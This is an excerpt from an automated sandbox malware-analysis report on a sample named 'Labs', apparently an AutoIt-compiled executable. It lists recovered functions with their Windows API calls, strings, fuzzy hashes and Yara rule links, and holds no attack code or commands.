Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 544b0ecd125e145de27c6c4376d1210267d2f42279131c8b3923043b93752c2f
Instruction ID: c789bbd7df7d09159d49412f1e03f432bb98967368d77dc36331bb292d410870
Opcode Fuzzy Hash: 544b0ecd125e145de27c6c4376d1210267d2f42279131c8b3923043b93752c2f
Instruction Fuzzy Hash: FB513F71B00205AFDB18CFA8CD85FAEBBBAFB88711F14812DF519D7290DB75A9008B50

Function 007723F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00771F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772412,?,00000000,?,?,?,?,00771AA7,00000000,?), ref: 00771F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007724AF
KillTimer.USER32(-00000001,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 0077254A
DestroyAcceleratorTable.USER32(00000000), ref: 007ABFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00771AA7,00000000,?,?,00771EBE,?,?), ref: 007AC04B
DeleteObject.GDI32(00000000), ref: 007AC05D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 378a9ec5dc7e248041b62daf2dfbd3b6979fd578f7b4ddbb1c4517f688cd6ecd
Instruction ID: 128e88de6ccbec1a2ebe13946333b59604eaeff8a5236439630daa0b88c213c1
Opcode Fuzzy Hash: 378a9ec5dc7e248041b62daf2dfbd3b6979fd578f7b4ddbb1c4517f688cd6ecd
Instruction Fuzzy Hash: A6619B31114640EFDB369F14CD48B2AB7F1FB81352F10CA28E06A56A61C779EC92DF94

Function 00772581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC

GetSysColor.USER32(0000000F), ref: 007725AF

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 286c158575d676603352d1b91788e2ab34b930fcdf09a5348d6a2066ab0bb5b7
Instruction ID: 9600fdb91f2e8d51f28b24716e9ea46a2ea3625ffe7cfef4e0dcc24445fb98c9
Opcode Fuzzy Hash: 286c158575d676603352d1b91788e2ab34b930fcdf09a5348d6a2066ab0bb5b7
Instruction Fuzzy Hash: 3D41A131104144AFDF215F289C88BB93765FB4A371F188362FE798A1E6D7388C42DB61

Function 007829BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00790B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00782A3E,?,00008000), ref: 00790BA7

Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00782ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00782C2C

Part of subcall function 00783EBE: _wcscpy.LIBCMT ref: 00783EF6

Part of subcall function 0079386D: _iswctype.LIBCMT ref: 00793875

Strings

Bad directive syntax error, xrefs: 007C008F
EA06, xrefs: 007BFD48
Unterminated string, xrefs: 007C00D6
AU3!, xrefs: 00782A93
#include depth exceeded. Make sure there are no recursive includes, xrefs: 007BFD17
Error opening the file, xrefs: 007BFD33, 007BFDAA

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: fd89bedd7e293d7d51a47cb9d738572358e26f5c4a3996b31da02df98834fbab
Instruction ID: d9a1f53f19d04cbd18faa53f431aeb3d42ae85bd408e226fa04147347b04146a
Opcode Fuzzy Hash: fd89bedd7e293d7d51a47cb9d738572358e26f5c4a3996b31da02df98834fbab
Instruction Fuzzy Hash: 6702AC30148341DFC724EF24C895AAFBBE5BF89710F10491DF49A932A2DB38DA49CB52

Function 007DAEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00800980), ref: 007DAF4E
GetDriveTypeW.KERNEL32(00000061,0082B5F0,00000061), ref: 007DB018
_wcscpy.LIBCMT ref: 007DB042

Strings

all, xrefs: 007DAF54
cdrom, xrefs: 007DAF6A
fixed, xrefs: 007DAF96
removable, xrefs: 007DAF80
network, xrefs: 007DAFAC
unknown, xrefs: 007DAFD9
ramdisk, xrefs: 007DAFC2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 577936cbe1420ba263fb0528c734f974c5889151e6bb508ac60a045ba970d6b4
Instruction ID: 91692bd531f0ce67243e78a726fbef7a8b8890a148ff5b195ce83951b3d600f2
Opcode Fuzzy Hash: 577936cbe1420ba263fb0528c734f974c5889151e6bb508ac60a045ba970d6b4
Instruction Fuzzy Hash: 7A51EF30218305EFCB14EF14D885AAAB7B5FF90340F54481EF595972A2DB38ED49CB82

Function 00774D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00774D62
__swprintf.LIBCMT ref: 00774DAC
__i64tow.LIBCMT ref: 007ADB3B

Strings

True, xrefs: 007ADAFC
0x%p, xrefs: 007ADB1D
%.15g, xrefs: 00774DA6
False, xrefs: 007ADB03

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: de1192cb3831894783ad2e0c30983c70bad5f58eeae5efae66e87d27f52c1aeb
Instruction ID: 02d3b7bfc699523b2950388b193e9602c3f4e59b634afa4aa0057720491e813d
Opcode Fuzzy Hash: de1192cb3831894783ad2e0c30983c70bad5f58eeae5efae66e87d27f52c1aeb
Instruction Fuzzy Hash: A141E571604609EFDF34EF64D845E7973E8EB45340F20856AE18ED7292EB399D428711

Function 007F7777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F778F
CreateMenu.USER32 ref: 007F77AA
SetMenu.USER32(?,00000000), ref: 007F77B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7846
IsMenu.USER32(?), ref: 007F785C
CreatePopupMenu.USER32 ref: 007F7866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F7893
DrawMenuBar.USER32 ref: 007F789B

Strings

0, xrefs: 007F7785
F, xrefs: 007F7887

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 45bdfe48e7a98d2ef8e4d578c88337905aef9755518ba52eb8a219b7176174cc
Instruction ID: 138b0d3346fbdf41ed4111f537087f3bd4b1c86b8329cf4e8dec98c553369f0a
Opcode Fuzzy Hash: 45bdfe48e7a98d2ef8e4d578c88337905aef9755518ba52eb8a219b7176174cc
Instruction Fuzzy Hash: AF414974A04209EFEB24DF64D888BAABBF5FF49350F144429FA45A7361D735A910CFA0

Function 007F7AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007F7B83
CreateCompatibleDC.GDI32(00000000), ref: 007F7B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007F7B9D
SelectObject.GDI32(00000000,00000000), ref: 007F7BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 007F7BB0
DeleteDC.GDI32(00000000), ref: 007F7BB9
GetWindowLongW.USER32(?,000000EC), ref: 007F7BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007F7BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007F7BE3

Strings

static, xrefs: 007F7B1B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: a215cfb798b8ef10b62c7178518c5c810577c2ea2340deab8e16f01e4fd30de4
Instruction ID: 76c249524833553c62c1e9abc6d50fcc9076b0416dea84c603e095a1d989e9ec
Opcode Fuzzy Hash: a215cfb798b8ef10b62c7178518c5c810577c2ea2340deab8e16f01e4fd30de4
Instruction Fuzzy Hash: DC318D72104219AFDF159F64DC49FEB3B69FF0A320F110215FA65A22A0CB39D821DFA0

Function 00797030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0079706B

Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58

__gmtime64_s.LIBCMT ref: 00797104
__gmtime64_s.LIBCMT ref: 0079713A
__gmtime64_s.LIBCMT ref: 00797157
__allrem.LIBCMT ref: 007971AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007971C9
__allrem.LIBCMT ref: 007971E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007971FE
__allrem.LIBCMT ref: 00797215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797233
__invoke_watson.LIBCMT ref: 007972A4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: d56ffec24a5b46b2d32a5b15fd797d6c77ce4b7e26f7564e8041e8fa8b87022e
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 54710671A14706EBDB189F7DEC46B6AB3B9BF81320F14422AF514E7281E778DA00C790

Function 007D2CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D2CE9
GetMenuItemInfoW.USER32(00837890,000000FF,00000000,00000030), ref: 007D2D4A
SetMenuItemInfoW.USER32(00837890,00000004,00000000,00000030), ref: 007D2D80
Sleep.KERNEL32(000001F4), ref: 007D2D92
GetMenuItemCount.USER32(?), ref: 007D2DD6
GetMenuItemID.USER32(?,00000000), ref: 007D2DF2
GetMenuItemID.USER32(?,-00000001), ref: 007D2E1C
GetMenuItemID.USER32(?,?), ref: 007D2E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007D2EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2EDC

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 37f87131d8f8c936f42cf2dbdb04e6fdef1351d3469f285b7ebbfd5cdaf95441
Instruction ID: 43c4fd2e697c085e75633bca962331bd9350d0e81cc07e2e65b58243ab11e9c1
Opcode Fuzzy Hash: 37f87131d8f8c936f42cf2dbdb04e6fdef1351d3469f285b7ebbfd5cdaf95441
Instruction Fuzzy Hash: 2B619EB0A00249AFDB21DF64CD88ABEBBB9FB50304F14045AF841A7352D739AD07DB21

Function 007F7548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007F75CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007F75CD
GetWindowLongW.USER32(?,000000F0), ref: 007F75F1
_memset.LIBCMT ref: 007F7602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007F7614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007F768C

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 282a1f37d4f972f4070d161b185a5fe01db75f7457b60d9a54afb59aded9132b
Instruction ID: ee08c96061a6ad169752113fdd0781ef5cd262a24be447221a50085855a2c592
Opcode Fuzzy Hash: 282a1f37d4f972f4070d161b185a5fe01db75f7457b60d9a54afb59aded9132b
Instruction Fuzzy Hash: 23616975904208AFDB20DFA8CC85EFE77B8EB49710F1001A9FA15A73A1D774AE51DB60

Function 007C77B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007C77DD
SafeArrayAllocData.OLEAUT32(?), ref: 007C7836
VariantInit.OLEAUT32(?), ref: 007C7848
SafeArrayAccessData.OLEAUT32(?,?), ref: 007C7868
VariantCopy.OLEAUT32(?,?), ref: 007C78BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 007C78CF
VariantClear.OLEAUT32(?), ref: 007C78E4
SafeArrayDestroyData.OLEAUT32(?), ref: 007C78F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C78FA
VariantClear.OLEAUT32(?), ref: 007C790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C7917

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 42cea9379a5a9137039b143b6271dea24f206b144ef60a8e2b9d422fd59f7864
Instruction ID: e786ac427cf10498b319620510601d2857bb019a2485adec3b638b5c167dca47
Opcode Fuzzy Hash: 42cea9379a5a9137039b143b6271dea24f206b144ef60a8e2b9d422fd59f7864
Instruction Fuzzy Hash: 9B414235A04219DFCF14DFA4D888EADBBB9FF48354F00806DEA55A7261CB34A945CFA4

Function 007E8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

CoInitialize.OLE32 ref: 007E8AED
CoUninitialize.OLE32 ref: 007E8AF8
CoCreateInstance.OLE32(?,00000000,00000017,00803BBC,?), ref: 007E8B58
IIDFromString.OLE32(?,?), ref: 007E8BCB
VariantInit.OLEAUT32(?), ref: 007E8C65
VariantClear.OLEAUT32(?), ref: 007E8CC6

Strings

Invalid parameter, xrefs: 007E8BE4
Failed to create object, xrefs: 007E8B63, 007E8C19
NULL Pointer assignment, xrefs: 007E8B9D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 313dfce8457830488872debdc111a15e79cd9e1b7083a66cbdf65c0e079fcc6f
Instruction ID: 9284c0239852e51d819c4afa08d894dc41f729b47dcd85d4937b814aea90f3fd
Opcode Fuzzy Hash: 313dfce8457830488872debdc111a15e79cd9e1b7083a66cbdf65c0e079fcc6f
Instruction Fuzzy Hash: E461AAB0206751DFC750DF11C888B6AB7E8BF49714F104859F9899B2A1CB78ED44CBA3

Function 007DBB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007DBB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007DBB89
GetLastError.KERNEL32 ref: 007DBB93
SetErrorMode.KERNEL32(00000000,READY), ref: 007DBC00

Strings

READY, xrefs: 007DBBD9
NOTREADY, xrefs: 007DBBBF
UNKNOWN, xrefs: 007DBBB8
READONLY, xrefs: 007DBBCB
INVALID, xrefs: 007DBBD2

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: f74043443feb7082579cb3b4c68fd7a1229ad53b29f4d3daa73304467240b657
Instruction ID: b61998826151320a30230ac1b7af2affcaec6c57cdc21fc95ea4597566a5919f
Opcode Fuzzy Hash: f74043443feb7082579cb3b4c68fd7a1229ad53b29f4d3daa73304467240b657
Instruction Fuzzy Hash: 4E31AF75A00209EFCB10EF64C849EA9B7B8FF44300F55806BE806E7395DB789941CB90

Function 007C9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007C9BCC
GetDlgCtrlID.USER32 ref: 007C9BD7
GetParent.USER32 ref: 007C9BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9BF6
GetDlgCtrlID.USER32(?), ref: 007C9BFF
GetParent.USER32(?), ref: 007C9C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9C1E

Strings

ListBox, xrefs: 007C9B89
ComboBox, xrefs: 007C9B54

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 3b1858b6664ca1b3c3e989c102020d4dc7e1c9de3efc7c2f3912b489dcde0d72
Instruction ID: 777f8d99eb0f50a9f262169d886de38a5838effd227dbe0c07db4158f062618e
Opcode Fuzzy Hash: 3b1858b6664ca1b3c3e989c102020d4dc7e1c9de3efc7c2f3912b489dcde0d72
Instruction Fuzzy Hash: 1B21C170940204BBCF04EBA0DC89EFEBBB9EF95310F50025AF96193291EB7958159B20

Function 007C9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007C9CB5
GetDlgCtrlID.USER32 ref: 007C9CC0
GetParent.USER32 ref: 007C9CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9CDF
GetDlgCtrlID.USER32(?), ref: 007C9CE8
GetParent.USER32(?), ref: 007C9D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9D07

Strings

ListBox, xrefs: 007C9C74
ComboBox, xrefs: 007C9C3F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
